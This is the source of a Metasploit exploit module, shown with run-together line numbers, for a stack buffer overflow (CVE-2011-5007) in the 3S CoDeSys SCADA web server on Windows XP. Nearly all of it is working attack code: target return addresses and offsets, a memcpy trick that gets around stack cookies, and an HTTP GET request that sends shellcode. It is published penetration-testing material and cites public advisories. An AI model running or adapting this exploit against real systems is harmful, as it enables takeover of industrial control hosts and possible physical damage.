Path: blob/master/modules/exploits/windows/scada/codesys_web_server.rb
19512 views
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45class MetasploitModule < Msf::Exploit::Remote6Rank = NormalRanking78include Msf::Exploit::Remote::Tcp910def initialize(info = {})11super(12update_info(13info,14'Name' => 'SCADA 3S CoDeSys CmpWebServer Stack Buffer Overflow',15'Description' => %q{16This module exploits a remote stack buffer overflow vulnerability in173S-Smart Software Solutions product CoDeSys Scada Web Server Version181.1.9.9. This vulnerability affects versions 3.4 SP4 Patch 2 and19earlier.20},21'License' => MSF_LICENSE,22'Author' => [23'Luigi Auriemma', # Original discovery and poc24'Celil UNUVER',25'TecR0c <roccogiovannicalvi[at]gmail.com>', # Module Metasploit26'sinn3r',27'Michael Coppola'28],29'References' => [30[ 'CVE', '2011-5007'],31[ 'OSVDB', '77387'],32[ 'URL', 'http://aluigi.altervista.org/adv/codesys_1-adv.txt' ],33[ 'EDB', '18187' ],34[ 'URL', 'https://www.cisa.gov/uscert/ics/alerts/ICS-ALERT-11-336-01A' ],35# The following clearifies why two people are credited for the discovery36[ 'URL', 'https://www.cisa.gov/uscert/ics/advisories/ICSA-12-006-01']37],38'DefaultOptions' => {39'EXITFUNC' => 'process',40'DisablePayloadHandler' => false41},42'Platform' => 'win',43'Payload' => {44'size' => 650,45'BadChars' => "\x00\x09\x0a\x3f\x20\x23\x5e\x25\x3a\x5c",46},4748'Targets' => [49[50'CoDeSys v2.3 on Windows XP SP3',51{52'Ret' => 0x7E4456F7, # jmp esp user3253'Offset' => 77554}55],56[57'CoDeSys v3.4 SP4 Patch 2 on Windows XP SP3',58{59# Abuse a memcpy() call to circumvent stack cookies60'Offset' => 525,61'Ret' => 0x02CDFD68,62'Src' => 0x02CDFD58,63'Dest' => 0x02CDFA1464}65],66],67'Privileged' => false,68'DisclosureDate' => '2011-12-02',69'Notes' => {70'Reliability' => UNKNOWN_RELIABILITY,71'Stability' => UNKNOWN_STABILITY,72'SideEffects' => UNKNOWN_SIDE_EFFECTS73}74)75)7677register_options([Opt::RPORT(8080)])78end7980def check81connect82sock.put("GET / HTTP/1.1\r\nHost: #{rhost}\r\n\r\n")83res = sock.get_once84disconnect8586# Can't flag the web server as vulnerable, because it doesn't87# give us a version88vprint_line(res.to_s)89if res.to_s =~ /3S_WebServer/90return Exploit::CheckCode::Detected91else92return Exploit::CheckCode::Safe93end94end9596def exploit97connect9899if target.name =~ /v2\.3/100buffer = rand_text(target['Offset'])101buffer << [target.ret].pack('V')102buffer << make_nops(8)103buffer << payload.encoded104105else106# CoDeSys v3.4 SP4 Patch 2 on Windows XP SP3107buffer = rand_text_alphanumeric(target['Offset'])108buffer << [target.ret].pack('V')109buffer << [target['Src']].pack('V')110buffer << [target['Dest']].pack('V')111buffer << [0x7FFFFFFF].pack('V') # Satisfy signed comparison112buffer << make_nops(8)113buffer << payload.encoded114buffer << "\\a"115end116117sploit = "GET /#{buffer} HTTP/1.0\r\n\r\n\r\n"118119print_status("Trying target #{target.name}...")120sock.put(sploit)121res = sock.get_once(-1, 5)122print_line(res) unless res.nil?123124handler125disconnect126end127end128129=begin130target.ret verified on:131- Win XP SP3 unpatched132- Win XP SP3 fully-patched133- Win XP SP3 fully-patched with Office 2007 Ultimate SP2 installed134=end135136137